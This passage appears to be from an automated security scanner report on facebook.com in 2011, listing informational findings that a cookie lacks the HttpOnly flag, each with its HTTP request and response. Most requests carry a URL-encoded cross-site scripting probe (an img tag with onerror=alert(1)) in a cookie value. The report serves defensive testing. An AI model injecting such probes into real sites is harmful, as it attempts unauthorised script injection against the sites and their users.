The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /find-friends HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.218.112
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 101636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.53. http://www.facebook.com/gale.l.schenk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /gale.l.schenk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gale.l.schenk HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.65
Connection: close
Date: Thu, 05 May 2011 11:42:46 GMT
Content-Length: 113481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.54. http://www.facebook.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.16.121
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 20550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.55. http://www.facebook.com/izaOllie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /izaOllie

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /izaOllie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.35
Connection: close
Date: Thu, 05 May 2011 11:42:50 GMT
Content-Length: 101169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.56. http://www.facebook.com/jezzas

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /jezzas

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jezzas HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.45
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 74561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.57. http://www.facebook.com/kimberly.christ

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /kimberly.christ

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kimberly.christ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.29
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 75242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.58. http://www.facebook.com/ladonna.lokey

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ladonna.lokey

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ladonna.lokey HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.75
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 68300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.59. http://www.facebook.com/lakendra.roberts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /lakendra.roberts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lakendra.roberts HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.33
Connection: close
Date: Thu, 05 May 2011 11:42:24 GMT
Content-Length: 82530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.60. http://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; act=1304613664644%2F2; next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; next_path=%2Fmobile%2F%3Fsettings

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 11:43:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.19.117
X-Cnection: close
Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 16254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.61. http://www.facebook.com/matthew.oliveira2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /matthew.oliveira2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /matthew.oliveira2 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.47
Connection: close
Date: Thu, 05 May 2011 11:42:11 GMT
Content-Length: 62437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.62. http://www.facebook.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; act=1304613659940%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613659942%2C%22act%22%2C1304613659940%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C469%2C478%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.25
X-Cnection: close
Date: Thu, 05 May 2011 11:41:04 GMT
Content-Length: 17082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.63. http://www.facebook.com/pages/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.28.109
Connection: close
Date: Thu, 05 May 2011 10:56:39 GMT
Content-Length: 32043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.64. http://www.facebook.com/patroyo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /patroyo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /patroyo HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.144.31
Connection: close
Date: Thu, 05 May 2011 11:42:38 GMT
Content-Length: 48049

